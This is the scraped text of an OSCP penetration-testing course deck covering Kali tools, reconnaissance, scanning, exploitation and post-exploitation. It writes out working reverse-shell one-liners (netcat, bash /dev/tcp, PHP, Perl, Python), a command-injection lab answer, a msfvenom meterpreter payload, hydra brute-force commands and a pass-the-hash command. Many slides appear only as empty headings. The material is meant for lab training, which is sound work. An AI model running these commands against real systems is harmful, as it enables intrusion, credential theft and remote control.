OSCP Training

OSCP Training
Basic Penetration Testing with Kali Linux
Agenda
Introduction
Part I : Basic Command for Penetration tester
Part II : Information Gathering
Part III : Scanning
Part IV : Enumeration
Part V : Pre-Exploitation Password Attack
Part VI : Exploitation
Part VII : Privilege Escalation
Part VIII : Post-Exploitation
Introduction
Part I : Basic Command
for
Penetration tester
Kali Linux
Update and Upgrade Kali
#Checking apt source
kali# nano /etc/apt/sources.list
#Update and Upgrade Kali

kali# apt-get update
kali# apt-get upgrade
Create web server for download file to target
#Python
kali# python –m SimpleHTTPServer
kali# python –m SimpleHTTPServer 8000
Create web server for download file to target
#Python
Connection testing with netcat
#Binding
Tester Victim
10.10.10.20 10.10.10.10
kali# nc 10.10.10.10 4444 [Windows OS]

C:\>nc.exe –vnlp 4444 -e cmd.exe
[Unix OS]
Root# nc –vnlp 4444 –e /bin/bash
#Reverse
Tester Victim
10.10.10.20 10.10.10.10
kali# nc -vnlp 4444 [Windows OS]
C:\> nc.exe 10.10.10.20 4444 -e cmd.exe
[Unix OS]
Root#nc 10.10.10.20 4444 –e /bin/bash
#Upload File
Tester Victim
10.10.10.20 10.10.10.10
kali# nc 10.10.10.10 4444 < file.txt [Windows OS]

C:\>nc.exe –vnlp 4444 > file.txt
[Unix OS]
Root# nc –vnlp 4444 > file.txt
#Download File
Tester Victim
10.10.10.20 10.10.10.10
kali# nc 10.10.10.10 4444 > file.txt [Windows OS]
C:\>nc.exe –vnlp 4444 < file.txt
[Unix OS]
Root# nc –vnlp 4444 < file.txt
Reverse shell
#Reverse
Tester Victim
10.10.10.20 192.168.0.10
kali# nc -vnlp 443
Reverse shell
#Netcat-reverse shell
nc 10.10.10.20 443 -e /bin/sh
#Bash-reverse shell
bash -i >& /dev/tcp/10.10.10.20/443 0>&1
#PHP-reverse shell
php -r '$sock=fsockopen("10.10.10.20",443);exec("/bin/sh -i <&3 >&3 2>&3");'
Reverse shell
#Perl-reverse shell
perl -e 'use
Socket;$i="10.10.10.20";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(conne
ct(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S"
);exec("/bin/sh -i");};‘
#Python-reverse shell
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.1
0.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Website Create https://www.revshells.com/

LAB : reverse shell in example scenario
Use Metasploitable 2 as victim
▪ access http://192.168.31.159/dvwa/login.php with admin/password
▪ Set DVWA security to LOW
▪ use command execution lab as the vulnerability
Use Kali as Tester to listen to victim and try reverse shell by using
▪ Netcat
▪ Bash
▪ Php
▪ Perl
▪ python
Hint:
Answer:
127.0.0.1 && nc 192.168.31.132 443 -e /bin/sh
127.0.0.1 && php -r '$sock=fsockopen("192.168.31.132",443);exec("/bin/sh -i <&3>&3 2>&3");'

Part II : Information
Gathering
Information gathering
#Other ways
Google
http://www.google.com
Dnsdumster
https://dnsdumpster.com/
Network tools
https://network-tools.com/
Shodan
https://www.shodan.io
Netcraft
https://www.netcraft.com/
Web Archive
http://web.archive.org
#Internal Network Information gathering (Passive mode)
Tcpdump
kali# tcpdump -i eth0 –vv | grep -v 192.168.31.132
kali# tcpdump -i eth0 –w outfile.pcap
Tshark
kali# tshark
#tcpdump
#tshark
Capture Packets with Tshark
tshark -i eth0 -w capture-output.pcap
Read a Pcap with Tshark

tshark -r capture-output.pcap
HTTP Analysis with Tshark

tshark -i eth0 -Y http.request -T fields -e http.host -e http.user_agent
#wireshark
#rasponder
#sudo responder -I eth0 -wrf
Part III : Scanning
Scanning
#Network Scanning with nmap
Scanning
Scanning
Scanning
Scanning
Scanning
Scanning
Scanning
Scanning
#Network Scanning with Zenmap
Scanning
#Network Scanning with arp-scan
kali# arp-scan 192.168.31.0/24
Web Scanning
#Basic web scanning by Nikto
kali#nikto -h http://victim.com
kali#nikto -h https://victim.com:443
Web Scanning
#Basic web path enumeration with dirb
kali#dirb http://victim.com
Web Scanning
#Basic web path enumeration with dirbuster

Part IV : Enumeration
What is Enumeration?
Enumeration
Enumeration
#Basic Enumeration by searchsploit
kali# searchsploit keyword
Enumeration
#Basic Enumeration by Exploit-DB web
Enumeration
#Basic Enumeration by Exploit-DB web
Part V : Pre-Exploitation
Password Attack
Password Attack
#Basic password attack by hydra
Password Attack
#Basic password attack by hydra
kali# gzip -d /usr/share/wordlists/rockyou.txt.gz
kali# hydra 192.168.1.1 ssh -l <login-name> -P <wordlist> -s 22 –vV

kali# hydra 10.10.1.131 telnet -l root -P pass.txt
Password Attack
# Hashcat
Password Attack
# John
Part VI : Exploitation
Exploitation
#Basic Exploitation by Metasploit
Exploitation: Badblue
Exploitation: CI Server
Exploitation
#Basic Network device exploitation with routersploit
Kali# git clone https://github.com/reverse-shell/routersploit.git

Kali# cd routersploit/
Kali/routersploit# python3 rsf.py
Exploitation
Exploitation
Exploitation
#Basic Exploitation by Metasploit
#Binding
Tester Victim
#Reverse
Tester Victim
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
Kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.117.137 LPORT=5555 -f exe -o
reverseshell.exe
Exploitation
Exploitation
kali# python -m SimpleHTTPServer 8000
At target (Windows 7) Access

http://192.168.117.136:8000/
Download and run the file
Exploitation
Part VII : Privilege Escalation
Privilege Escalation
#UNIX #WINDOWS
#Local Privilege Escalation with Metasploit
Download BeRoot tools Privilege Escalation
https://github.com/AlessandroZ/BeRoot/releases
Run file beRoot.exe
>beRoot.exe
Part VIII : Post-Exploitation
Post Exploitation
#hashdump
Copy to file
Post Exploitation
#Crack with John the ripple
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Post Exploitation: Enabling Remote Desktop
Post Exploitation
#Pass the hash
pth-winexe -U administrator%"aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42"
//192.168.200.132 cmd.exe
Post Exploitation
#Token Impersonation
Post Exploitation
Post Exploitation
Hack The Box | Previse
Connect VPN
Hack The Box
Player
OS : Kali Linux
OS : Linux
Hack The Box
Scan
Nmap - Port Scan
Enumeration
gobuster
Dirbuster
Exploit
Exploring the Admin Area and Source Code
netcat to my own machine
brute-forcin password
SUID
Gitgub
git init --> Initialize a local Git repository
git clone --> Create a local copy of a remote repository
git clean --> Removes untracked files from the working directory
git commit --> Takes the staged snapshot and commits it to the project history
Pentest website list
https://www.exploit-db.com
https://www.revshells.com
https://guif.re/
https://gtfobins.github.io/
https://oscpnotes.infosecsanyam.in/
https://oscp.infosecsanyam.in/

OSCP Training - 01

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

OSCP Training - 01

Uploaded by

Copyright:

Available Formats

Basic Penetration Testing with Kali Linux

#Update and Upgrade Kali

kali# nc 10.10.10.10 4444 [Windows OS]

kali# nc 10.10.10.10 4444 < file.txt [Windows OS]

Website Create https://www.revshells.com/

127.0.0.1 && php -r '$sock=fsockopen("192.168.31.132",443);exec("/bin/sh -i <&3>&3 2>&3");'

Read a Pcap with Tshark

HTTP Analysis with Tshark

#Basic web path enumeration with dirbuster

kali# hydra 192.168.1.1 ssh -l <login-name> -P <wordlist> -s 22 –vV

Kali# git clone https://github.com/reverse-shell/routersploit.git

At target (Windows 7) Access

Hack The Box

You might also like